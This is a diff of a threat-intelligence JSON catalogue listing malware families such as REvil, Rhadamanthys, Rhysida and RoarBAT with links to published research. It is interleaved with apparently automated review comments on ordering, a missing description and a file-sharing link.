"https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", + "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/", + "https://www.ironnet.com/blog/ransomware-graphic-blog", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", "https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", + "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/", + 
"https://www.certego.net/en/news/malware-tales-sodinokibi/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html", + "https://twitter.com/Jacob_Pimental/status/1391055792774729728", + "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", + "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", "https://ke-la.com/will-the-revils-story-finally-be-over/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/", + "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", + "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs", + "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + 
"https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/", + "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html", + "https://twitter.com/VK_Intel/status/1374571480370061312?s=20", + "https://www.kaseya.com/potential-attack-on-kaseya-vsa/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/", + "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/", + "https://twitter.com/R3MRUM/status/1412064882623713283", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", - "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", + "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/", + "https://www.flashpoint-intel.com/blog/revil-disappears-again/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://twitter.com/SyscallE/status/1411074271875670022", + 
"https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", + "https://www.youtube.com/watch?v=l2P5CMH9TE0", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", + "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/", + "https://www.secureworks.com/research/lv-ransomware", + "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", + 
"https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "http://www.secureworks.com/research/threat-profiles/gold-southfield", + "https://velzart.nl/blog/ransomeware/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://www.youtube.com/watch?v=P8o6GItci5w", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://home.treasury.gov/news/press-releases/jy0471", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", + "https://redcanary.com/blog/uncompromised-kaseya/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", + 
"https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", "https://securelist.com/sodin-ransomware/91473/", - "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", - "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", - "https://asec.ahnlab.com/ko/19860/", - "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", "https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware", - "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", - "https://analyst1.com/file-assets/History-of-REvil.pdf", - "https://twitter.com/_alex_il_/status/1412403420217159694", - "https://twitter.com/svch0st/status/1411537562380816384", - "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20", - "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html", - 
"https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", - "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-southfield", - "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", - "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", - "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html", - "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://blog.amossys.fr/sodinokibi-malware-analysis.html", - "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", - "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", - "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", - "https://www.connectwise.com/resources/revil-profile", + "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html", + "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/", + "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", "https://isc.sans.edu/diary/27012", - "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states", - 
"https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs" + "https://vimeo.com/449849549", + "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", + "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", + "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics", + "https://threatintel.blog/OPBlueRaven-Part1/", + "https://twitter.com/fwosar/status/1420119812815138824", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://hatching.io/blog/ransomware-part2", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20", + "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + "https://www.youtube.com/watch?v=tZVFMVm5GAk", + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://asec.ahnlab.com/ko/19640/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", + "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", + "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain", + 
"https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", + "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + "https://www.cyjax.com/2021/07/09/revilevolution/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.youtube.com/watch?v=QYQQUUpU04s", + "https://analyst1.com/file-assets/History-of-REvil.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [ "Sodin", 
@@ -41635,16 +43587,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", - "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", - "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", - "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", - "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", + "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", - "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran" + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" ], "synonyms": [], "type": [] 
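Review bot: The rgdoor refs hunk is a pure reordering of the same URLs (the Secureworks Exchange link moves from last to fifth, nothing is added or dropped), which reads like the export writing refs in hash or set order rather than a stable one. If the order carries no meaning, sort the list before serialising (something like `refs = sorted(set(refs))` in the generator, or its equivalent) so that regenerations only diff on real additions; whether the order originates upstream or in the export is not visible here. The same no-op reorder makes up most of the rhadamanthys, rising_sun, rm3, rms, robinhood, rockloader, roguerobin, rokrat, rorschach and roshtyak hunks.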
@@ -41657,14 +43609,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys", - "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/", - "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88", - "https://www.malware-traffic-analysis.net/2023/01/03/index.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques", + "https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/", "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023", + "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", + "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88", + "https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/", + "https://www.malware-traffic-analysis.net/2023/01/03/index.html", "https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/", - "https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/" + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] 
@@ -41698,6 +43655,25 @@ "uuid": "5f1bac43-6506-43f0-b5d6-709a39abd671", "value": "RHttpCtrl" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida", + "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", + "https://www.bleepingcomputer.com/news/security/rhysida-ransomware-behind-recent-attacks-on-healthcare/", + "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", + "https://www.linkedin.com/posts/prodaft_organic-relationship-between-rhysida-vice-activity-7091777236663427072-NQEs", + "https://www.sentinelone.com/blog/rhysida-ransomware-raas-crawls-out-of-crimeware-undergrowth-to-attack-chilean-army/", + "https://blog.talosintelligence.com/rhysida-ransomware/", + "https://www.secplicity.org/2023/05/23/scratching-the-surface-of-rhysida-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7d77891-afc2-4be6-b831-a3b2253fb195", + "value": "Rhysida" + }, { "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", "meta": { 
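Review bot: The new Rhysida entry ships with `"description": ""`, so a consumer rendering the galaxy gets a name and eight references but no statement of what the object is, while the RoarBAT entry added in the rms hunk carries a one-sentence summary. A minimal line grounded in the cited reports would do, e.g. `"description": "Rhysida is a ransomware family; Check Point Research reports ties to Vice Society."`; if descriptions are copied verbatim from an upstream feed, leave it empty here rather than inventing one and fix it at the source. `"synonyms": []` and `"type": []` are consistent with the surrounding entries.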
@@ -41718,9 +43694,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", - "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf", + "https://mega.nz/file/lkh1gY5C#93FUlwTwl0y27cfM0jtm4SYnWbtk06d0qoDg1e4eQ6s", + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" + "http://www.issuemakerslab.com/research3/", + "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] @@ -41786,10 +43764,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", - "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/" ], "synonyms": [], "type": [] @@ -41802,8 +43780,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3", - "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", - "https://twitter.com/URSNIFleak" + "https://twitter.com/URSNIFleak", + "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/" ], "synonyms": [], "type": [] 
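Review bot: The rifdoor refs now include `https://mega.nz/file/lkh1gY5C#93FUlwTwl0y27cfM0jtm4SYnWbtk06d0qoDg1e4eQ6s`, a file-sharing link whose fragment is the file's decryption key; it names neither a publisher nor a title, it will not survive the share being removed, and any tooling that dereferences refs would fetch an unvetted file. Prefer the original publication URL or a web.archive.org capture (the REvil refs earlier in this diff already use one for a cisoclub.ru PDF) and keep the share link out of refs. If refs are imported verbatim from an upstream feed, a host check in the importer is the place to catch this.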
@@ -41816,48 +43794,62 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", - "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", - "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", - "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", + "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/", - "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf" + "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [ "Gussdoor", - "Remote Manipulator System" + "Remote Manipulator System", + "RuRAT" ], "type": [] }, "uuid": "94339b04-9332-4691-b820-5021368f1d3a", "value": "RMS" }, + { + "description": "According to SOCRadar, this is a batch script that uses WinRAR to delete files with target file 
extensions from a disk.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roar_bat", + "https://socradar.io/sandworm-attackers-use-winrar-to-wipe-data-from-government-devices/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ef66505-9b5b-4a80-af64-b51dc7a006ba", + "value": "RoarBAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood", - "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", - "https://goggleheadedhacker.com/blog/post/12", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", - "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://twitter.com/VK_Intel/status/1121440931759128576", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", - "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", - "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", - "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", 
"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://goggleheadedhacker.com/blog/post/12", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/", - "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/" + "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", + "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/", + "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://twitter.com/VK_Intel/status/1121440931759128576", + "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", + "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/", + "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + 
